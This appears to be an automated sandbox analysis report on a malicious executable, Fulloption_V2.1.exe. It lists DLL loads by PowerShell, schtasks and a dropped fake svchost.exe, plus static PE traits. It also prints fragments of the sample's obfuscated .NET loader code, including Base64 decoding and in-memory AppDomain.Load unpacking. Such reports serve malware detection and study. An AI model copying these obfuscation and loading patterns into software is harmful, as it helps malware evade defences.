Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\svchost.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

.NET source code contains method to dynamically call methods (often used by packers)

Source: Fulloption_V2.1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Fulloption_V2.1.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Fulloption_V2.1.exe

Static file information: File size 4400640 > 1048576

Source: Fulloption_V2.1.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3f6200

Source: Fulloption_V2.1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.hNOHDG8JesKswFNAOD4uikWJfSdvhtPJ0KU5,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.FhuHT39Hcrlpc3VJzcpEmZexIK3HCerG0Y9C,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.Fgv43nUc5XFwvkWRKAUtNKcyXyeibqIt7pNX,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.ZFV5io1ixPWDD2eFsMz69Tv1tcmCSCWiWL5U,bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.RD1n5VxC4F1jd()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[2],bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.WRxv5EAB1AsaF(Convert.FromBase64String(_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.hNOHDG8JesKswFNAOD4uikWJfSdvhtPJ0KU5,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.FhuHT39Hcrlpc3VJzcpEmZexIK3HCerG0Y9C,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.Fgv43nUc5XFwvkWRKAUtNKcyXyeibqIt7pNX,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.ZFV5io1ixPWDD2eFsMz69Tv1tcmCSCWiWL5U,bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.RD1n5VxC4F1jd()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[2],bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.WRxv5EAB1AsaF(Convert.FromBase64String(_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.hNOHDG8JesKswFNAOD4uikWJfSdvhtPJ0KU5,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.FhuHT39Hcrlpc3VJzcpEmZexIK3HCerG0Y9C,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.Fgv43nUc5XFwvkWRKAUtNKcyXyeibqIt7pNX,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.ZFV5io1ixPWDD2eFsMz69Tv1tcmCSCWiWL5U,bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.RD1n5VxC4F1jd()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[2],bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.WRxv5EAB1AsaF(Convert.FromBase64String(_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.hNOHDG8JesKswFNAOD4uikWJfSdvhtPJ0KU5,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.FhuHT39Hcrlpc3VJzcpEmZexIK3HCerG0Y9C,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.Fgv43nUc5XFwvkWRKAUtNKcyXyeibqIt7pNX,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.ZFV5io1ixPWDD2eFsMz69Tv1tcmCSCWiWL5U,bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.RD1n5VxC4F1jd()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[2],bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.WRxv5EAB1AsaF(Convert.FromBase64String(_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: EhVpMT8GhwZpb01mGHvMU System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: i8a1GMg98692O7b3mEydE System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: i8a1GMg98692O7b3mEydE
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: EhVpMT8GhwZpb01mGHvMU System.AppDomain.Load(byte[])
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: i8a1GMg98692O7b3mEydE System.AppDomain.Load(byte[])
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: i8a1GMg98692O7b3mEydE
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: EhVpMT8GhwZpb01mGHvMU System.AppDomain.Load(byte[])
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: i8a1GMg98692O7b3mEydE System.AppDomain.Load(byte[])
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: i8a1GMg98692O7b3mEydE
Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: EhVpMT8GhwZpb01mGHvMU System.AppDomain.Load(byte[])
Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: i8a1GMg98692O7b3mEydE System.AppDomain.Load(byte[])
Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs	.Net Code: i8a1GMg98692O7b3mEydE

Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Code function: 2_2_00007FF6AE6E0D9C push rsi; ret	2_2_00007FF6AE6E0DA1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD3479D2A5 pushad ; iretd	4_2_00007FFD3479D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD3477D2A5 pushad ; iretd	7_2_00007FFD3477D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD3479D2A5 pushad ; iretd	12_2_00007FFD3479D2A6

Source: svchost.exe.0.dr, epshUjPPFi8VAukWaTuS6SgPmPHhoxaSEk0RkjN7LYEiZkZLfM8XgYvqprlPD2I4acyXu2wsNSVFFzmTz0D8SL0A.cs	High entropy of concatenated method names: 'lLlozhn22xlByUn733fdwBdhLMxxLGDU3yanVulQvTYnjik1GRJ7ddmG2WNhEbgulpVURp9dM8OYozff7A1ScMEe', 'RFLWhqlB4KP4usbHtAhcFrt7M2SSzXSJ5WRDwp29EUAwOdSQlY1UKdvKOKhyvS21GH2cUQh4cSPht7WrBxrn0pRU', '_1vYZFEIcFnzwLBg1OX5thISvJlmznuv', 'nCneH4pLXzIeclOmQvEQMJB7BnApoImKgRx1dhJaFbFBSQt2xBvQJ5CPB9', 'BOTP9EOLEYvGi2ghNdyqOyGVsBWN1o7fEgaUam7bLWFGszL9D8FNdrJjDe', '_69qbXEv5idF2syalvaJXZi5AaXaM3QQxdEhhVl40XOsJtTPNXfHejc8IIa', 'yJtdWi5MAxvaMnSHZoWYsZgzCjPAee7r3ATSL2PvJCeXvjzv3Ecudd2ZuN', '_9fOKoWoFegi8YVdh0pvC8jnvv1Sr6v48w9NMW8fHJRvzlSXu9TR8EvuwPk', 'jR0bU97EzqUKmO6fpzyHCAuv7wntaxMMDQw64KlxkfoFja4R13skbGJUS3', 'E7DQO66sDqRGGq9Ru7eAJ0tTp0T7yOxkXzo0cPX2jbzTOh2k80Af8Lvtwn'
Source: svchost.exe.0.dr, ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.cs	High entropy of concatenated method names: 'fkNZMK99FovrpzCSQil6vfrfaJ7gik3', 'xKm7QDoGTWTe3GiIsGCTkO2PudjrwCW', 'tIk6KXWJhXgWRXmdx11z59eQP2Gyx2U', 'booBJ8dQVHmf7b9XsC8UT44ngHrTkRb'
